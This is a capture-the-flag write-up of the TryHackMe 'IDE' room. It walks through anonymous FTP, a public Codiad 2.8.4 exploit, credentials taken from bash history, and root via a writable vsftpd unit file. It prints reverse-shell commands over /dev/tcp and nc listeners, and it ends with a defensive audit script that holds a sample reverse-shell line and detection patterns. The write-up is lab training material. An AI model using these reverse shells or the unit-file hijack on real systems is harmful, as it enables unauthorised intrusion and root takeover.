TryHackMe: IDE
IDE was nice; every room follows the same approach, yet every room feels so different. I’ve done so many sudo-permission privilege escalations, but I still feel like I learn a new thing in each room.
https://tryhackme.com/room/ide
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.35.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 14:55 GMT
Nmap scan report for 10.10.35.131
Host is up (0.079s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::-
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.23 seconds
We got 3 interesting ports:
- 21
- 80
- 62337
FTP
We’ll start with FTP, and as the scan says, anonymous login is allowed. Inside, we don’t seem to find anything at first, except when we cd into the oddly named ... directory:
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.35.131
Connected to 10.10.35.131.
220 (vsFTPd 3.0.3)
Name (10.10.35.131:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||44785|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
A file simply named -; we download it to our machine and read its contents:
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
Web 62337
We have found some names and a hint for a password, but nowhere to log in. Port 80 doesn’t have anything, so we proceed to port 62337:
A login page, just what we wanted. After some trial and error we see that john’s credentials are john:password, and we are able to get inside:
We couldn’t find much to do, and gobuster didn’t give anything useful, so we try Google. This should be easy enough, since the title of the web page gives the tool name and version (Codiad 2.8.4):
Shell as www-data
We find an exploit, and before sending the payload it asks us to start a listener on the chosen port that serves the reverse-shell command, and a second listener on the port one above to catch the shell:
┌──(venv)─(kali㉿kali)-[~/Desktop]
└─$ python3 49705.py http://10.10.35.131:62337/ john password - 4444 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/-/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...
After starting both listeners in separate terminals, we can run the script without any problems and get a shell:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4445
listening on [any] 4445 ...
connect to [-] from (UNKNOWN) [10.10.35.131] 39094
bash: cannot set terminal process group (892): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$
Shell as drac
While enumerating, we find some credentials in drac’s home directory, in its readable .bash_history:
www-data@ide:/home/drac$ cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
We use these credentials to log in over SSH and can now read the user flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh drac@10.10.35.131
drac@10.10.35.131's password:
drac@ide:~$ ls
user.txt
drac@ide:~$ cat user.txt
[REDACTED]
Shell as root
Enumerating as drac, we see that we have sudo permission to restart the vsftpd service:
drac@ide:~$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
Checking the service status, we find the unit file it is loaded from and check its permissions:
drac@ide:~$ systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
Active: active (running) since Thu 2025-02-13 16:17:01 UTC; 1min 45s ago
Process: 737 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
Main PID: 779 (vsftpd)
Tasks: 1 (limit: 498)
CGroup: /system.slice/vsftpd.service
└─779 /usr/sbin/vsftpd /etc/vsftpd.conf
Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.
drac@ide:~$ ls -la /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug 4 2021 /lib/systemd/system/vsftpd.service
We have write permissions on the unit file, and we also see that it runs an ExecStartPre command before the main process. Our goal is to replace that command with a reverse shell, which we can do with nano. After editing the file, we first need to reload the systemd daemon configuration:
drac@ide:~$ systemctl daemon-reload
==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon ===
Authentication is required to reload the systemd state.
Authenticating as: drac
Password:
==== AUTHENTICATION COMPLETE ===
Then we restart the service with sudo:
drac@ide:~$ sudo /usr/sbin/service vsftpd restart
Job for vsftpd.service failed because the control process exited with error code.
See "systemctl status vsftpd.service" and "journalctl -xe" for details.
drac@ide:~$ systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
Active: failed (Result: exit-code) since Thu 2025-02-13 16:27:15 UTC; 4s ago
Process: 1657 ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf (code=killed, signal=TERM)
Process: 1758 ExecStartPre=/bin/bash -c bash -i >& /dev/tcp/-/4444 0>&1 (code=exited, status=1/FAILURE)
Main PID: 1657 (code=killed, signal=TERM)
We get a root shell and can now read the root flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.35.131] 46556
bash: cannot set terminal process group (22296): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# cd root
root@ide:/root# cat root.txt
[REDACTED]
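As an added defensive check, not part of the original write-up: a small POSIX shell audit that flags the two conditions chained in this privilege escalation, a unit file writable by a non-root user and a sudo rule letting that user restart the same unit. The unit files, the sudo -l output and the REDACTED_IP placeholder are constructed samples; it assumes GNU stat on Linux.

```shell
#!/bin/sh
# Added audit example, not part of the original write-up. It looks for the
# two conditions chained in this room: a systemd unit file writable by a
# non-root user, and a sudo rule letting that user restart the same unit.
# Assumes GNU stat (Linux). All sample files below are constructed.

# unit_writable FILE -> exit 0 if the group or other write bit is set
unit_writable() {
    mode=$(stat -c %a "$1") || return 1
    case "$mode" in
        *[2367]? | *[2367]) return 0 ;;  # 2nd-last digit = group, last = other
    esac
    return 1
}

# unit_has_shell_exec FILE -> exit 0 if an Exec*= line spawns a shell or uses /dev/tcp
unit_has_shell_exec() {
    grep -Eq '^Exec(Start|StartPre|StartPost|Stop|Reload)=.*(/bin/(ba)?sh|/dev/tcp/)' "$1"
}

# risky_restarts SUDO_L_OUTPUT UNITDIR -> prints each unit name that appears in
# a "/usr/sbin/service <name> restart" sudo rule AND whose unit file is writable
risky_restarts() {
    sed -n 's#.*/usr/sbin/service \([A-Za-z0-9_.@-]*\) restart.*#\1#p' "$1" |
    while read -r name; do
        unit="$2/$name.service"
        [ -f "$unit" ] && unit_writable "$unit" && echo "$name"
    done
}

# Constructed samples mirroring the room: vsftpd.service is group-writable and
# already carries a shell ExecStartPre; sshd.service is a sane control. Prints
# the temp directory holding them.
make_samples() {
    d=$(mktemp -d)
    printf '[Service]\nExecStartPre=/bin/mkdir -p /run/sshd\nExecStart=/usr/sbin/sshd -D\n' \
        > "$d/sshd.service"
    chmod 644 "$d/sshd.service"
    printf '[Service]\nExecStartPre=/bin/bash -c "bash -i >& /dev/tcp/REDACTED_IP/4444 0>&1"\nExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf\n' \
        > "$d/vsftpd.service"
    chmod 664 "$d/vsftpd.service"
    printf 'User drac may run the following commands on ide:\n    (ALL : ALL) /usr/sbin/service vsftpd restart\n' \
        > "$d/sudo-l.txt"
    echo "$d"
}

# On a real host: sudo -l > /tmp/sudo-l.txt; risky_restarts /tmp/sudo-l.txt /lib/systemd/system
```

The fix on the defending side is the same check run in reverse: unit files under /lib/systemd/system should be root-owned and mode 644, and a sudo rule that restarts a service is only as safe as the unit it restarts.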